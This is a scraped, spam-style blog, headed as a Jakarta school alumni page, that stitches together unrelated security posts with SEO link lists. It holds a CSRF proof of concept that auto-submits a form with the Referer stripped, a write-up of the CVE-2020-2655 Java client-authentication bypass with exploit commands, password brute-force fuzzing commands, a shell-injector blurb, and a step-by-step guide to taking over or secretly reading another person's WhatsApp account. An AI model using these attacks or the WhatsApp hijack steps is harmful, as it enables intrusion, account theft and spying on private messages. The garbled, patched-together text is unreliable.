IKATAN ALUMNI SMPN 233 JAKARTA BLOG

Salam semua para alumni SMPN 233 Jakarta, Apa kabar ?
Blog ini gue buat dengan tujuan biar kita bisa saling sharing dan juga bila ada informasi terbaru yang isinya kumpul - kumpul bisa dengan segera disampikan, Buat para alumni yang jauh mengerti tentang blog dan sebagainya, bisa bantu gue memperbaiki blog ini dan menjadikannya lebih indah.....Gue tunggu partisipasinya.

salam kehangatan

see zhiunk

26 Apr 2020

CSRF Referer Header Strip

Intro

Most of the web applications I see are kinda binary when it comes to CSRF protection; either they have one implemented using CSRF tokens (and more-or-less covering the different functions of the web application) or there is no protection at all. Usually, it is the latter case. However, from time to time I see application checking the Referer HTTP header.

A couple months ago I had to deal with an application that was checking the Referer as a CSRF prevention mechanism, but when this header was stripped from the request, the CSRF PoC worked. BTW it is common practice to accept empty Referer, mainly to avoid breaking functionality.

The OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet tells us that this defense approach is a baaad omen, but finding a universal and simple solution on the Internetz to strip the Referer header took somewhat more time than I expected, so I decided that the stuff that I found might be useful for others too.

Solutions for Referer header strip

Most of the techniques I have found were way too complicated for my taste. For example, when I start reading a blog post from Egor Homakov to find a solution to a problem, I know that I am going to:
  1. learn something very cool;
  2. have a serious headache from all the new info at the end.
This blog post from him is a bit lighter and covers some useful theoretical background, so make sure you read that first before you continue reading this post. He shows a few nice tricks to strip the Referer, but I was wondering; maybe there is an easier way?

Rich Lundeen (aka WebstersProdigy) made an excellent blog post on stripping the Referer header (again, make sure you read that one first before you continue). The HTTPS to HTTP trick is probably the most well-known one, general and easy enough, but it quickly fails the moment you have an application that only runs over HTTPS (this was my case).

The data method is not browser independent but the about:blank trick works well for some simple requests. Unfortunately, in my case the request I had to attack with CSRF was too complex and I wanted to use XMLHttpRequest. He mentions that in theory, there is anonymous flag for CORS, but he could not get it work. I also tried it, but... it did not work for me either.

Krzysztof Kotowicz also wrote a blog post on Referer strip, coming to similar conclusions as Rich Lundeen, mostly using the data method.

Finally, I bumped into Johannes Ullrich's ISC diary on Referer header and that led to me W3C's Referrer Policy. So just to make a dumb little PoC and show that relying on Referer is a not a good idea, you can simply use the "referrer" meta tag (yes, that is two "r"-s there).

The PoC would look something like this:
<html>
<meta name="referrer" content="never">
<body>
<form action="https://vistimsite.com/function" method="POST">
<input type="hidden" name="param1" value="1" />
<input type="hidden" name="param2" value="2" />
...
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Conclusion

As you can see, there is quite a lot of ways to strip the Referer HTTP header from the request, so it really should not be considered a good defense against CSRF. My preferred way to make is PoC is with the meta tag, but hey, if you got any better solution for this, use the comment field down there and let me know! :)

Continue reading
  1. Definicion De Hacker
  2. Hacking Madrid
  3. Hacking Day
  4. Aprender Seguridad Informatica
  5. Tools Hacking
  6. Quiero Ser Hacker
  7. Ethical Hacking Certification
  8. Informatico Hacker
  9. Body Hacking
  10. Growth Hacking Ejemplos

25 Apr 2020

CEH: 10 Hacking Tools For Hackers


There are a lot of hacking tools available over the internet but mostly we need some of them. In this blog you'll learn about hacking tools which are typically used in the world of hacking by penetration testers.

SmartWhois

SmartWhois is an information-gathering program that allows you to find all available information about an IP address, hostname, or domain, including country, state or province, city, name of the network provider, administrator, and technical support contact information. SmartWhois is a graphical version of the basic Whois program.

SocksChain

SocksChain is a tool that gives a hacker the ability to attack through a chain of proxy servers. The main purpose of doing this is to hide the hacker's real IP address and therefore minimize the chance of detection. When a hacker works through several proxy servers in series, it's much harder to locate the hacker. Tracking the attacker's IP address through the logs of several proxy servers is complex and tedious work. If one of the proxy servers' log files is lost or incomplete, the chain is broken, and the hacker's IP address remains anonymous.

NeoTrace, VisualRoute, and VisualLookout

NeoTrace, VisualRoute, and VisualLookout are all packet-tracking tools with a GUI or visual interface. They plot the path the packets travel on a map and can visually identify the locations of routers and other internet working devices. These tools operate similarly to traceroute and perform the same information gathering; however, they provide a visual representation of the results.

Visualware's eMailTrackerPro

Visualware's eMailTrackerPro ( www.emailtrackerpro.com/ ) and MailTracking ( http://mailtracking.com/ ) are tools that allow an ethical hacker to track email messages. When you use these tools to send an email, forward an email, reply to an email, or modify an email, the resulting actions and tracks of the original email are logged. The sender is notified of all actions performed on the tracked email by an automatically generated email.

IPEye

IPEye is a TCP port scanner that can do SYN, FIN, Null, and XMAS scans. It's a command line tool.
IPEye probes the ports on a target system and responds with closed, reject, drop, or open. Closed means there is a computer on the other end, but it doesn't listen at the port. Reject means a firewall is rejecting the connection to the port (sending a reset back). Drop means a firewall is dropping everything to the port, or there is no computer on the other end. Open means some kind of service is listening at the port. These responses help a hacker identify what type of system is responding.

IPSecScan

IPSecScan is a tool that can scan either a single IP address or a range of addresses looking for systems that are IPSec enabled that means the system has IPSec enabled while disabled means that it either has IPSec disabled, the compatibility issue or the configuration issue that not reveal to you that it has IPSec enabled. Indeterminable means that the scanner isn't sure if IPSec is enabled or disabled.

Icmpenum

Icmpenum uses not only ICMP Echo packets to probe networks, but also ICMP Timestamp and ICMP Information packets. Furthermore, it supports spoofing and sniffing for reply packets. Icmpenum is great for scanning networks when the firewall blocks ICMP Echo packets but fails to block Timestamp or Information packets.

SNMP Scanner

SNMP Scanner allows you to scan a range or list of hosts performing ping, DNS, and Simple Network Management Protocol (SNMP) queries. This tool helps you to find out the current information about the device of SNMP nodes in the given network.

hping2 tool

The hping2 tool is notable because it contains a host of other features besides OS fingerprinting such as TCP, User Datagram Protocol (UDP), ICMP, and raw-IP ping protocols, traceroute mode, and the ability to send files between the source and target system.

THC-Scan, PhoneSweep, and TeleSweep

THC-Scan, PhoneSweep, and TeleSweep are tools that identify phone numbers and can dial a target to make a connection with a computer modem. These tools generally work by using a predetermined list of common usernames and passwords in an attempt to gain access to the system. Most remote-access dial-in connections aren't secured with a password or use very rudimentary security.Related word

CVE-2020-2655 JSSE Client Authentication Bypass

TLDR: If you are using TLS ClientAuthentication in Java 11 or newer you should patch NOW. There is a trivial bypass.


During our joint research on DTLS state machines, we discovered a really interesting vulnerability (CVE-2020-2655) in the recent versions of Sun JSSE (Java 11, 13). Interestingly, the vulnerability does not only affect DTLS implementations but does also affects the TLS implementation of JSSE in a similar way. The vulnerability allows an attacker to completely bypass client authentication and to authenticate as any user for which it knows the certificate WITHOUT needing to know the private key. If you just want the PoC's, feel free to skip the intro.





DTLS

I guess most readers are very familiar with the traditional TLS handshake which is used in HTTPS on the web.


DTLS is the crayon eating brother of TLS. It was designed to be very similar to TLS, but to provide the necessary changes to run TLS over UDP. DTLS currently exists in 2 versions (DTLS 1.0 and DTLS 1.2), where DTLS 1.0 roughly equals TLS 1.1 and DTLS 1.2 roughly equals TLS 1.2. DTLS 1.3 is currently in the process of being standardized. But what exactly are the differences? If a protocol uses UDP instead of TCP, it can never be sure that all messages it sent were actually received by the other party or that they arrived in the correct order. If we would just run vanilla TLS over UDP, an out of order or dropped message would break the connection (not only during the handshake). DTLS, therefore, includes additional sequence numbers that allow for the detection of out of order handshake messages or dropped packets. The sequence number is transmitted within the record header and is increased by one for each record transmitted. This is different from TLS, where the record sequence number was implicit and not transmitted with each record. The record sequence numbers are especially relevant once records are transmitted encrypted, as they are included in the additional authenticated data or HMAC computation. This allows a receiving party to verify AEAD tags and HMACs even if a packet was dropped on the transport and the counters are "out of sync".
Besides the record sequence numbers, DTLS has additional header fields in each handshake message to ensure that all the handshake messages have been received. The first handshake message a party sends has the message_seq=0 while the next handshake message a party transmits gets the message_seq=1 and so on. This allows a party to check if it has received all previous handshake messages. If, for example, a server received message_seq=2 and message_seq=4 but did not receive message_seq=3, it knows that it does not have all the required messages and is not allowed to proceed with the handshake. After a reasonable amount of time, it should instead periodically retransmit its previous flight of handshake message, to indicate to the opposing party they are still waiting for further handshake messages. This process gets even more complicated by additional fragmentation fields DTLS includes. The MTU (Maximum Transmission Unit) plays a crucial role in UDP as when you send a UDP packet which is bigger than the MTU the IP layer might have to fragment the packet into multiple packets, which will result in failed transmissions if parts of the fragment get lost in the transport. It is therefore desired to have smaller packets in a UDP based protocol. Since TLS records can get quite big (especially the certificate message as it may contain a whole certificate chain), the messages have to support fragmentation. One would assume that the record layer would be ideal for this scenario, as one could detect missing fragments by their record sequence number. The problem is that the protocol wants to support completely optional records, which do not need to be retransmitted if they are lost. This may, for example, be warning alerts or application data records. Also if one party decides to retransmit a message, it is always retransmitted with an increased record sequence number. For example, the first ClientKeyExchange message might have record sequence 2, the message gets dropped, the client decides that it is time to try again and might send it with record sequence 5. This was done as retransmissions are only part of DTLS within the handshake. After the handshake, it is up to the application to deal with dropped or reordered packets. It is therefore not possible to see just from the record sequence number if handshake fragments have been lost. DTLS, therefore, adds additional handshake message fragment information in each handshake message record which contains information about where the following bytes are supposed to be within a handshake message.


If a party has to replay messages, it might also refragment the messages into bits of different (usually smaller) sizes, as dropped packets might indicate that the packets were too big for the MTU). It might, therefore, happen that you already have received parts of the message, get a retransmission which contains some of the parts you already have, while others are completely new to you and you still do not have the complete message. The only option you then have is to retransmit your whole previous flight to indicate that you still have missing fragments. One notable special case in this retransmission fragmentation madness is the ChangecipherSpec message. In TLS, the ChangecipherSpec message is not a handshake message, but a message of the ChangeCipherSpec protocol. It, therefore, does not have a message_sequence. Only the record it is transmitted in has a record sequence number. This is important for applications that have to determine where to insert a ChangeCipherSpec message in the transcript.

As you might see, this whole record sequence, message sequence, 2nd layer of fragmentation, retransmission stuff (I didn't even mention epoch numbers) which is within DTLS, complicates the whole protocol a lot. Imagine being a developer having to implement this correctly and secure...  This also might be a reason why the scientific research community often does not treat DTLS with the same scrutiny as it does with TLS. It gets really annoying really fast...

Client Authentication

In most deployments of TLS only the server authenticates itself. It usually does this by sending an X.509 certificate to the client and then proving that it is in fact in possession of the private key for the certificate. In the case of RSA, this is done implicitly the ability to compute the shared secret (Premaster secret), in case of (EC)DHE this is done by signing the ephemeral public key of the server. The X.509 certificate is transmitted in plaintext and is not confidential. The client usually does not authenticate itself within the TLS handshake, but rather authenticates in the application layer (for example by transmitting a username and password in HTTP). However, TLS also offers the possibility for client authentication during the TLS handshake. In this case, the server sends a CertificateRequest message during its first flight. The client is then supposed to present its X.509 Certificate, followed by its ClientKeyExchange message (containing either the encrypted premaster secret or its ephemeral public key). After that, the client also has to prove to the server that it is in possession of the private key of the transmitted certificate, as the certificate is not confidential and could be copied by a malicious actor. The client does this by sending a CertificateVerify message, which contains a signature over the handshake transcript up to this point, signed with the private key which belongs to the certificate of the client. The handshake then proceeds as usual with a ChangeCipherSpec message (which tells the other party that upcoming messages will be encrypted under the negotiated keys), followed by a Finished message, which assures that the handshake has not been tampered with. The server also sends a CCS and Finished message, and after that handshake is completed and both parties can exchange application data. The same mechanism is also present in DTLS.

But what should a Client do if it does not possess a certificate? According to the RFC, the client is then supposed to send an empty certificate and skip the CertificateVerify message (as it has no key to sign anything with). It is then up to the TLS server to decide what to do with the client. Some TLS servers provide different options in regards to client authentication and differentiate between REQUIRED and WANTED (and NONE). If the server is set to REQUIRED, it will not finish the TLS handshake without client authentication. In the case of WANTED, the handshake is completed and the authentication status is then passed to the application. The application then has to decide how to proceed with this. This can be useful to present an error to a client asking him to present a certificate or insert a smart card into a reader (or the like). In the presented bugs we set the mode to REQUIRED.

State machines

As you might have noticed it is not trivial to decide when a client or server is allowed to receive or send each message. Some messages are optional, some are required, some messages are retransmitted, others are not. How an implementation reacts to which message when is encompassed by its state machine. Some implementations explicitly implement this state machine, while others only do this implicitly by raising errors internally if things happen which should not happen (like setting a master_secret when a master_secret was already set for the epoch). In our research, we looked exactly at the state machines of DTLS implementations using a grey box approach. The details to our approach will be in our upcoming paper (which will probably have another blog post), but what we basically did is carefully craft message flows and observed the behavior of the implementation to construct a mealy machine which models the behavior of the implementation to in- and out of order messages. We then analyzed these mealy machines for unexpected/unwanted/missing edges. The whole process is very similar to the work of Joeri de Ruiter and Erik Poll.


JSSE Bugs

The bugs we are presenting today were present in Java 11 and Java 13 (Oracle and OpenJDK). Older versions were as far as we know not affected. Cryptography in Java is implemented with so-called SecurityProvider. Per default SUN JCE is used to implement cryptography, however, every developer is free to write or add their own security provider and to use them for their cryptographic operations. One common alternative to SUN JCE is BouncyCastle. The whole concept is very similar to OpenSSL's engine concept (if you are familiar with that). Within the JCE exists JSSE - the Java Secure Socket Extension, which is the SSL/TLS part of JCE. The presented attacks were evaluated using SUN JSSE, so the default TLS implementation in Java. JSSE implements TLS and DTLS (added in Java 9). However, DTLS is not trivial to use, as the interface is quite complex and there are not a lot of good examples on how to use it. In the case of DTLS, only the heart of the protocol is implemented, how the data is moved from A to B is left to the developer. We developed a test harness around the SSLEngine.java to be able to speak DTLS with Java. The way JSSE implemented a state machine is quite interesting, as it was completely different from all other analyzed implementations. JSSE uses a producer/consumer architecture to decided on which messages to process. The code is quite complex but worth a look if you are interested in state machines.

So what is the bug we found? The first bug we discovered is that a JSSE DTLS/TLS Server accepts the following message sequence, with client authentication set to required:


JSSE is totally fine with the messages and finishes the handshake although the client does NOT provide a certificate at all (nor a CertificateVerify message). It is even willing to exchange application data with the client. But are we really authenticated with this message flow? Who are we? We did not provide a certificate! The answer is: it depends. Some applications trust that needClientAuth option of the TLS socket works and that the user is *some* authenticated user, which user exactly does not matter or is decided upon other authentication methods. If an application does this - then yes, you are authenticated. We tested this bug with Apache Tomcat and were able to bypass ClientAuthentication if it was activated and configured to use JSSE. However, if the application decides to check the identity of the user after the TLS socket was opened, an exception is thrown:

The reason for this is the following code snippet from within JSSE:


As we did not send a client certificate the value of peerCerts is null, therefore an exception is thrown. Although this bug is already pretty bad, we found an even worse (and weirder) message sequence which completely authenticates a user to a DTLS server (not TLS server though). Consider the following message sequence:

If we send this message sequence the server magically finishes the handshake with us and we are authenticated.

First off: WTF
Second off: WTF!!!111

This message sequence does not make any sense from a TLS/DTLS perspective. It starts off as a "no-authentication" handshake but then weird things happen. Instead of the Finished message, we send a Certificate message, followed by a Finished message, followed by a second(!) CCS message, followed by another Finished message. Somehow this sequence confuses JSSE such that we are authenticated although we didn't even provide proof that we own the private key for the Certificate we transmitted (as we did not send a CertificateVerify message).
So what is happening here? This bug is basically a combination of multiple bugs within JSSE. By starting the flight with a ClientKeyExchange message instead of a Certificate message, we make JSSE believe that the next messages we are supposed to send are ChangeCipherSpec and Finished (basically the first exploit). Since we did not send a Certificate message we are not required to send a CertificateVerify message. After the ClientKeyExchange message, JSSE is looking for a ChangeCipherSpec message followed by an "encrypted handshake message". JSSE assumes that the first encrypted message it receives will be the Finished message. It, therefore, waits for this condition. By sending ChangeCipherSpec and Certificate we are fulfilling this condition. The Certificate message really is an "encrypted handshake message" :). This triggers JSSE to proceed with the processing of received messages, ChangeCipherSpec message is consumed, and then the Certifi... Nope, JSSE notices that this is not a Finished message, so what JSSE does is buffer this message and revert to the previous state as this step has apparently not worked correctly. It then sees the Finished message - this is ok to receive now as we were *somehow* expecting a Finished message, but JSSE thinks that this Finished is out of place, as it reverted the state already to the previous one. So this message gets also buffered. JSSE is still waiting for a ChangeCipherSpec, "encrypted handshake message" - this is what the second ChangeCipherSpec & Finished is for. These messages trigger JSSE to proceed in the processing. It is actually not important that the last message is a Finished message, any handshake message will do the job. Since JSSE thinks that it got all required messages again it continues to process the received messages, but the Certificate and Finished message we sent previously are still in the buffer. The Certificate message is processed (e.g., the client certificate is written to the SSLContext.java). Then the next message in the buffer is processed, which is a Finished message. JSSE processes the Finished message (as it already had checked that it is fine to receive), it checks that the verify data is correct, and then... it stops processing any further messages. The Finished message basically contains a shortcut. Once it is processed we can stop interpreting other messages in the buffer (like the remaining ChangeCipherSpec & "encrypted handshake message"). JSSE thinks that the handshake has finished and sends ChangeCipherSpec Finished itself and with that the handshake is completed and the connection can be used as normal. If the application using JSSE now decides to check the Certificate in the SSLContext, it will see the certificate we presented (with no possibility to check that we did not present a CertificateVerify). The session is completely valid from JSSE's perspective.

Wow.

The bug was quite complex to analyze and is totally unintuitive. If you are still confused - don't worry. You are in good company, I spent almost a whole day analyzing the details... and I am still confused. The main problem why this bug is present is that JSSE did not validate the received message_sequence numbers of incoming handshake message. It basically called receive, sorted the received messages by their message_sequence, and processed the message in the "intended" order, without checking that this is the order they are supposed to be sent in.
For example, for JSSE the following message sequence (Certificate and CertificateVerify are exchanged) is totally fine:

Not sending a Certificate message was fine for JSSE as the REQUIRED setting was not correctly evaluated during the handshake. The consumer/producer architecture of JSSE then allowed us to cleverly bypass all the sanity checks.
But fortunately (for the community) this bypass does not work for TLS. Only the less-used DTLS is vulnerable. And this also makes kind of sense. DTLS has to be much more relaxed in dealing with out of order messages then TLS as UDP packets can get swapped or lost on transport and we still want to buffer messages even if they are out of order. But unfortunately for the community, there is also a bypass for JSSE TLS - and it is really really trivial:

Yep. You can just not send a CertificateVerify (and therefore no signature at all). If there is no signature there is nothing to be validated. From JSSE's perspective, you are completely authenticated. Nothing fancy, no complex message exchanges. Ouch.

PoC

A vulnerable java server can be found _*here*_. The repository includes a pre-built JSSE server and a Dockerfile to run the server in a vulnerable Java version. (If you want, you can also build the server yourself).
You can build the docker images with the following commands:

docker build . -t poc

You can start the server with docker:

docker run -p 4433:4433 poc tls

The server is configured to enforce client authentication and to only accept the client certificate with the SHA-256 Fingerprint: B3EAFA469E167DDC7358CA9B54006932E4A5A654699707F68040F529637ADBC2.

You can change the fingerprint the server accepts to your own certificates like this:

docker run -p 4433:4433 poc tls f7581c9694dea5cd43d010e1925740c72a422ff0ce92d2433a6b4f667945a746

To exploit the described vulnerabilities, you have to send (D)TLS messages in an unconventional order or have to not send specific messages but still compute correct cryptographic operations. To do this, you could either modify a TLS library of your choice to do the job - or instead use our TLS library TLS-Attacker. TLS-Attacker was built to send arbitrary TLS messages with arbitrary content in an arbitrary order - exactly what we need for this kind of attack. We have already written a few times about TLS-Attacker. You can find a general tutorial __here__, but here is the TLDR (for Ubuntu) to get you going.

Now TLS-Attacker should be built successfully and you should have some built .jar files within the apps/ folder.
We can now create a custom workflow as an XML file where we specify the messages we want to transmit:

This workflow trace basically tells TLS-Attacker to send a default ClientHello, wait for a ServerHelloDone message, then send a ClientKeyExchange message for whichever cipher suite the server chose and then follow it up with a ChangeCipherSpec & Finished message. After that TLS-Attacker will just wait for whatever the server sent. The last action prints the (eventually) transmitted application data into the console. You can execute this WorkflowTrace with the TLS-Client.jar:

java -jar TLS-Client.jar -connect localhost:4433 -workflow_input exploit1.xml

With a vulnerable server the result should look something like this:

and from TLS-Attackers perspective:

As mentioned earlier, if the server is trying to access the certificate, it throws an SSLPeerUnverifiedException. However, if the server does not - it is completely fine exchanging application data.
We can now also run the second exploit against the TLS server (not the one against DTLS). For this case I just simply also send the certificate of a valid client to the server (without knowing the private key). The modified WorkflowTrace looks like this:

Your output should now look like this:

As you can see, when accessing the certificate, no exception is thrown and everything works as if we would have the private key. Yep, it is that simple.
To test the DTLS specific vulnerability we need a vulnerable DTLS-Server:

docker run -p 4434:4433/udp poc:latest dtls

A WorkflowTrace which exploits the DTLS specific vulnerability would look like this:

To execute the handshake we now need to tell TLS-Attacker additionally to use UDP instead of TCP and DTLS instead of TLS:

java -jar TLS-Client.jar -connect localhost:4434 -workflow_input exploit2.xml -transport_handler_type UDP -version DTLS12

Resulting in the following handshake:

As you can see, we can exchange ApplicationData as an authenticated user. The server actually sends the ChangeCipherSpec,Finished messages twice - to avoid retransmissions from the client in case his ChangeCipherSpec,Finished is lost in transit (this is done on purpose).


Conclusion

These bugs are quite fatal for client authentication. The vulnerability got CVSS:4.8 as it is "hard to exploit" apparently. It's hard to estimate the impact of the vulnerability as client authentication is often done in internal networks, on unusual ports or in smart-card setups. If you want to know more about how we found these vulnerabilities you sadly have to wait for our research paper. Until then ~:)

Credits

Paul Fiterau Brostean (@PaulTheGreatest) (Uppsala University)
Robert Merget (@ic0nz1) (Ruhr University Bochum)
Juraj Somorovsky (@jurajsomorovsky) (Ruhr University Bochum)
Kostis Sagonas (Uppsala University)
Bengt Jonsson (Uppsala University)
Joeri de Ruiter (@cypherpunknl)  (SIDN Labs)

 

 Responsible Disclosure

We reported our vulnerabilities to Oracle in September 2019. The patch for these issues was released on 14.01.2020.
Related articles
  1. Hacking To The Gate
  2. Hacking Wifi Android
  3. Significado De Hacker
  4. Curso De Hacking
  5. Hacking Growth
  6. Hacking Prank
  7. Start Hacking
  8. Hacking Etico Pdf
  9. Curso Ethical Hacking

Webkiller Tool | Information Gathering | Github

Related posts
  1. Growth Hacking Courses
  2. Hacker Pelicula
  3. Que Es Hacking Etico
  4. Curso Hacking Etico Gratis
  5. Curso De Ciberseguridad Y Hacking Ético

How To Fetch Data From The Database | Tutorial 4


Welcome to my another PHP and MYSQL tutorial. In the previous I've discussed about the data insertion into database by using PHP and MYSQL. So i did successfully in the previous video.

In this video tutorial I'll discuss How to fetch data from the database called as data fetching. It's really a simple thing to access your data which is in database. You just have to do a little work for this. For fetching data you have follow some steps.

How to Fetch Data from Database

Step 1:

Make a connection with your database which i did in the previous blog.

Step 2:

If you wanna fetching a values in "form" or in a table so just have to create a form, table or whatever you want in HTML. I've created a table where I'll show you how to fetch data in table form.

Step 3:

Write a query SELECT * FROM table_Name;

Step 4:

Create a Loop for fetching all the data on a single click. 

Step 5:

Create variables for the sake of storing a different values from the combined values in the loop variable like:

//while loop to fetch all the values from the database and stored in the variable named "row".
while($row = mysql_fetch_array(mysql_query($conn,$query))){

$name = $row['username']; //$name will save all the username values from the loop variable 'row'.
$pass = $row['password']; //$pass will save the password values from the loop variable 'row'.

}

Now watch the video for better understanding.



How to use Brutality?

Examples:
   Use default wordlist with 5 threads (-t 5) and hide 404 messages (–e 404) to fuzz the given URL (http://192.168.1.1/FUZZ):
python brutality.py -u 'http://192.168.1.1/FUZZ' -t 5 -e 404

   Use common_pass.txt wordlist (-f ./wordlist/common_pass.txt), remove response with 6969 length (-r 6969) and proxy at 127.0.0.1:8080 (-p http://127.0.0.1:8080) to fuzz the given URL (http://192.168.1.1/brute.php?username=admin&password=FUZZ&submit=submit#):
python brutality.py -u 'http://192.168.1.1/brute.php?username=admin&password=FUZZ&submit=submit#' -f ./wordlist/common_pass.txt -r 6969 -p http://127.0.0.1:8080

ToDo List:
  • Smooth output.
  • Export file report.
  • Modularization.

Related links

How To Start | How To Become An Ethical Hacker

Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let's change that!
This Post is for the people that:

  • Have No Experience With Cybersecurity (Ethical Hacking)
  • Have Limited Experience.
  • Those That Just Can't Get A Break


OK, let's dive into the post and suggest some ways that you can get ahead in Cybersecurity.
I receive many messages on how to become a hacker. "I'm a beginner in hacking, how should I start?" or "I want to be able to hack my friend's Facebook account" are some of the more frequent queries. Hacking is a skill. And you must remember that if you want to learn hacking solely for the fun of hacking into your friend's Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination for technology and your desire to be an expert in computer systems. Its time to change the color of your hat 😀

 I've had my good share of Hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have.

If you have no experience don't worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period.OK, so you have zero experience and limited skills…my advice in this instance is that you teach yourself some absolute fundamentals.
Let's get this party started.
  •  What is hacking?
Hacking is identifying weakness and vulnerabilities of some system and gaining access with it.
Hacker gets unauthorized access by targeting system while ethical hacker have an official permission in a lawful and legitimate manner to assess the security posture of a target system(s)

 There's some types of hackers, a bit of "terminology".
White hat — ethical hacker.
Black hat — classical hacker, get unauthorized access.
Grey hat — person who gets unauthorized access but reveals the weaknesses to the company.
Script kiddie — person with no technical skills just used pre-made tools.
Hacktivist — person who hacks for some idea and leaves some messages. For example strike against copyright.
  •  Skills required to become ethical hacker.
  1. Curosity anf exploration
  2. Operating System
  3. Fundamentals of Networking
*Note this sites





More info

Top Users Command In Linux Operating System With Descriptive Definitions


Linux is a command line interface and has a graphical interface as well. But the only thing we should know how we interact with Linux tools and applications with the help of command line. This is the basic thing of Linux.  As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well.
In this blog you will get a content about commands of Linux which are collectively related to the system users. That means if you wanna know any kind of information about the users of the system like username passwords and many more.

id

The "id" command is used in Linux operating system for the sake of getting knowledge about active user id with login and group. There may be different users and you wanna get a particular id of the user who is active at that time so for this you just have to type this command over the terminal.

last

The "last" command is used in Linux operating system to show the information about the last logins on the system. If you forget by which user id you have logged in at last time. So for this information you can search login detail by using this command.

who

The "who" command is used in Linux distributions to display the information about the current user which a an active profile over the Linux operating system. If you are in the system and you don't know about that active user and suddenly you have to know about that user detail so you can get the info by using this command.

groupadd

The "groupadd admin" is the command which is used in Linux operating system to add a group in the Linux system to gave the privileges to that group.

useradd

The "useradd" command is used in Linux operating system to add user or users to a specific group. If you wanna add a user name Umer so for this matter you just have to write a command i.e. useradd -c "Umer".

userdel

The "userdel" command is used in Linux operating system for the purpose to delete any user or users from the particular group present in the linux operating system. For example "userdel Umer" this command will delete the user named Umer.

adduser

The "adduser" command is a simple command used to create directly any user in the system. There is no need to make a group for this. You just have to type the command with user name like adduser Umer, it will created a user by name Umer.

usermod

The "usermod" is a command used in Linux operating system to modify the information of any particular user. You can edit or delete information of any particular user in the Linux operating system.


More info

How To Hack Any Whatsapp Account In 2020

The article will also be broken down into different subtopics and subcategories. This to make it easy for those who are just interested in skimming through the article to pick the part of WhatsApp hack they are most interested in. Just incase you don't have enough time to go through the entire article.

Search queries like these are a common place; Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular trade fair in the world? This article gives you all the solution you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger is now on an end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old &deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use a software that can hack WhatsApp remotely. All manufacturers offer to read the WhatsApp messages an extra web portal. In addition to the Whatsapp messages but can also spy on other messengers. So you can also have access to social media accounts.

The software may only be installed on a smartphone. If the user of the smartphone has been informed about the installation and effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack Whatsapp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, the other phone only needs to clone WhatsApp messages is internet connection.

The trick to hack Whatsapp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, here lies the vulnerability. But you can also protect yourself from the Whatsapp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read Whatsapp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read Whatsapp messages. Even with the PIN or fingerprint, the Whatsapp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack an account from Whatsapp, the app from the App Store must be installed on the second cell phone. After the installation of Whatsapp, target's phone number is entered. A confirmation request must be waited until access to the smartphone of the victim exists.

STEP 2: WhatsApp Account Confirmation

The confirmation of the Whatsapp account is the actual security risk of the messenger. Whatsapp usually confirms the registration via SMS. Occasionally the confirmation will also be sent by automated phone call via a phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim immediately notices the Whatsapp hack as soon as Whatsapp is opened. If the victim goes through the sign-in process again. The attacker loses access to the messages and no Whatsapp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack whatsapp online. Here you can read WhatsApp messages via a browser and also write. The target user can continue to use his cell phone (works for iOS, Android phone etc) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to be able to read WhatsApp messages by installing software. Access to the unlocked smartphone is required for a short time. In addition, cell phone, a computer or laptop is necessary. On this the Whatsapp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, Whatsapp must be started there. The Whatsapp settings include Whatsapp Web . If this is selected, Whatsapp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

If the QR code is scanned in the browser with the smartphone. There is a permanent connection and Whatsapp messages can be read. If you want to hack Whatsapp in this way. You have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this Whatsapp hack only when the settings are invoked to Whatsapp Web in the app. Whatsapp messages can be read via the browser. Regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps from Android or iOS to send and receive messages. But Whatsapp remains everyone's favorite globally!

Whatsapp is one of the popular apps in the world. There are more than 2 billion active users on Whatsapp, messaging daily with the app. Why do people love WhatsApp? Whatsapp is very convenient and easy to use.

Other messaging apps like Facebook Messenger, still needs a special account to sign up for this app. If you change a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.

HACKER NT

More articles


  1. Hacking Etico
  2. Phone Hacking
  3. Whatsapp Hacking
  4. Blog Seguridad Informática
  5. Hacking 2018

Vulnx V2.0 - An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS {(Wordpress , Joomla , Drupal , Prestashop ...)


Vulnx is An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms, fast cms detection,informations gathering and vulnerabilitie Scanning of the target like subdomains, ipaddresses, country, org, timezone, region, ans and more ...
